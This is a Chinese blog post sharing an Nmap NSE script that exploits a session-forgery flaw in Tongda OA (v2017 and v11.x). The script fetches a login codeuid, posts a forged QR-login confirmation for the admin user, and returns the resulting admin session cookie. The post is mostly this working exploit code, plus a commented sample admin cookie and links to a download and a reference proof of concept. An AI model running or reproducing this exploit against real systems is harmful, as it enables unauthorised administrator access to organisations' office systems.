通达OA伪造SESSION | Nmap脚本

时间:2022-07-23
本文章向大家介绍通达OA伪造SESSION | Nmap脚本,主要内容包括其使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。

通达OA又出问题了,这次的脚本是参照一个哥们儿github上代码写的,用了一晚上,我终于证明了一个问题,v2017版本和v11.x版本利用方式一毛一样,被这个爹给坑害了,画个圈圈诅咒他!

local stdnse = require "stdnse"
local shortport = require "shortport"
local http = require "http"
local json = require "json"

description = "sth"
author = "test94"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"default"}


prerule = function()
    print("-----------------------------------")
    print("[+] start ... ")
    print("[-] (if port is filtered, nothing will be checked)")
    print("")
end

portrule = shortport.service({"http", "https", "afs3-callback", "http-proxy"})


action = function(host, port)
    local output = stdnse.output_table()
    output.result = "not vulnerable"

    local options = {header = {}, content = {}}    
    options["header"]["Cache-Control"] = "max-age=0" 
    options["header"]["Upgrade-Insecure-Requests"] = "1" 
    options["header"]["User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.113 Safari/537.36 Edg/81.0.416.58" 
    options["header"]["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
    options["header"]["Accept-Encoding"] = "gzip, deflate" 
    options["header"]["Accept-Language"] = "zh-Hans-CN,zh-CN;q=0.9,zh;q=0.8,en;q=0.7,en-GB;q=0.6,en-US;q=0.5" 
    -- options["header"]["Cookie"] = "USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=40cff017; PHPSESSID=1edafhs3br4q1ajb49q9a2u4a1; KEY_RANDOMDATA=8271"
    options["header"]["Connection"] = "close" 
    options["header"]["Content-Type"] = "application/x-www-form-urlencoded"
    
    local req = http.generic_request(host, port, "GET", "/ispirit/login_code.php", options)
    local status, codeuid = json.parse(req.body)
    codeuid = codeuid['codeuid']

    local postdatas = "codeuid="..codeuid.."&uid=1&source=pc&type=confirm&username=admin"
    options['content'] = postdatas
    local req2 = http.generic_request(host, port, "POST", "/general/login_code_scan.php", options)
    local status_TF, status_sta = json.parse(req2.body)
    if status_sta['status'] == '1' then
        options['content'] = ""
        local req3 = http.generic_request(host, port, "GET", "/ispirit/login_code_check.php?codeuid="..codeuid, options)
        local fake_cookie = req3.header['set-cookie']
        output.result = fake_cookie
    end
    return output
end

下载地址:http://www.my-synology.cn:37980/sharing/e96EXxAHM

参考文章

https://github.com/NS-Sp4ce/TongDaOA-Fake-User

随机文章
本站知识点必读
最近更新